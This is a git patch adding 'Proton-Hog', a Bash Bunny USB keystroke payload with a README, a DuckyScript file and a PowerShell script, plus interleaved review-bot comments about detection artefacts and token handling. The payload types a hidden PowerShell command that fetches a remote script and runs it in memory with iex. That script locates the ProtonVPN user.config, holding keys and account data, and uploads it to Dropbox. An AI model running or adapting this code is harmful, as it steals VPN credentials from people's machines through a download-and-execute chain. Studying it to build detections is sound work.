From 81b3dabbca40f24bea1588c1fdadf201815ef43e Mon Sep 17 00:00:00 2001
From: atomic <>
Date: Sun, 4 Dec 2022 21:53:18 -0500
Subject: [PATCH] Add files via upload
BashBunny/payloads/Proton-Hog/ | 108 ++++++++++++++++++++++
BashBunny/payloads/Proton-Hog/payload.txt | 16 ++++
BashBunny/payloads/Proton-Hog/s.ps1 | 41 ++++++++
3 files changed, 165 insertions(+)
create mode 100644 BashBunny/payloads/Proton-Hog/
create mode 100644 BashBunny/payloads/Proton-Hog/payload.txt
create mode 100644 BashBunny/payloads/Proton-Hog/s.ps1
diff --git a/BashBunny/payloads/Proton-Hog/ b/BashBunny/payloads/Proton-Hog/
new file mode 100644
index 0000000..6f2f2d1
--- /dev/null
+++ b/BashBunny/payloads/Proton-Hog/
@@ -0,0 +1,108 @@
+ Table of Contents
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+# Proton-Hog
+A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information.
+## Description
+This payload will enumerate through the ProtonVPN directories, looking for the file that stores the userconfig file
+Then dropbox will be used to exfiltrate the files to cloud storage
+## Getting Started
+### Dependencies
+* DropBox or other file sharing service - Your Shared link for the intended file
+* Windows 10,11
+(back to top)
+### Executing program
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
+(back to top)
+## Contributing
+All contributors names will be listed here
+I am Jakoby
+(back to top)
+## Version History
+* 0.1
+ * Initial Release
+(back to top)
+## Contact
+📱 My Socials 📱
+ YouTube
+ |
+ Twitter
+ |
+ I-Am-Jakoby's Discord
+ |
+(back to top)
+(back to top)
+## Acknowledgments
+* [Hak5](
+* [I-Am-Jakoby](
+(back to top)
diff --git a/BashBunny/payloads/Proton-Hog/payload.txt b/BashBunny/payloads/Proton-Hog/payload.txt
new file mode 100644
index 0000000..602ef07
--- /dev/null
+++ b/BashBunny/payloads/Proton-Hog/payload.txt
@@ -0,0 +1,16 @@
+REM Title: Proton-Hog
+REM Author: atomiczsec
+REM Description: A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information.
+REM Target: Windows 10
+DELAY 2000
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
+REM Remember to replace the link with your DropBox shared link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
\ No newline at end of file
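Review bot: The REM header gives title, author and target but says nothing about the host artefacts the `STRING` line leaves behind, which a blue team replaying this in an exercise needs in order to validate its detections. I would add a line such as `REM Artefacts: Run-dialog history (RunMRU), powershell.exe started by explorer.exe with -w h -ep Bypass, remote script passed to iex (process-creation and script-block logs)`. The header also says `REM Target: Windows 10` while the README in this commit lists Windows 10 and 11, so the two should be made to agree. The trailing `mode con:cols=14 lines=1` on the last REM line looks like a leftover fragment and should be removed from the comment.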
diff --git a/BashBunny/payloads/Proton-Hog/s.ps1 b/BashBunny/payloads/Proton-Hog/s.ps1
new file mode 100644
index 0000000..ff568d7
--- /dev/null
+++ b/BashBunny/payloads/Proton-Hog/s.ps1
@@ -0,0 +1,41 @@
+function DropBox-Upload {
+ [CmdletBinding()]
+ param (
+ [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
+ [Alias("f")]
+ [string]$SourceFilePath
+ )
+ $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token
+ $outputFile = Split-Path $SourceFilePath -leaf
+ $TargetFilePath="/$outputFile"
+ $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
+ $authorization = "Bearer " + $DropBoxAccessToken
+ $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
+ $headers.Add("Authorization", $authorization)
+ $headers.Add("Dropbox-API-Arg", $arg)
+ $headers.Add("Content-Type", 'application/octet-stream')
+ Invoke-RestMethod -Uri -Method Post -InFile $SourceFilePath -Headers $headers
+ }
+# Test the path to the ProtonVPN directory and if it is availible, change directory to where the user.config is stored
+if (-not(Test-Path "$env:USERPROFILE\AppData\Local\ProtonVPN")) {
+ try {
+ Write-Host "The VPN folder has not been found. "
+ }
+ catch {
+ throw $_.Exception.Message
+ }
+ }
+ else {
+$protonVpnPath = "$env:USERPROFILE\AppData\Local\ProtonVPN"
+cd $protonVpnPath
+Get-ChildItem | Where-Object {$ -Match "ProtonVPN.exe"} | cd
+Get-ChildItem | cd
+# Upload user.config to dropbox
+DropBox-Upload -f "user.config"
\ No newline at end of file
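Review bot: The script has no header comment stating what it reads and where it sends it, and `DropBox-Upload` keeps a bearer token as a plaintext literal in the function body (`$DropBoxAccessToken = ...`). Because the script is served from a shared link, anyone who obtains that link or recovers the script text from script-block logging also holds the token, so the comment on that line should state that the token must be narrowly scoped and revoked once the test ends. I would add at the top `# Reads user.config under %LOCALAPPDATA%\ProtonVPN and uploads it to Dropbox; credentials in that file must be treated as exposed and rotated after the test`. The `try`/`catch` around `Write-Host` in the not-found branch only rethrows and can be dropped.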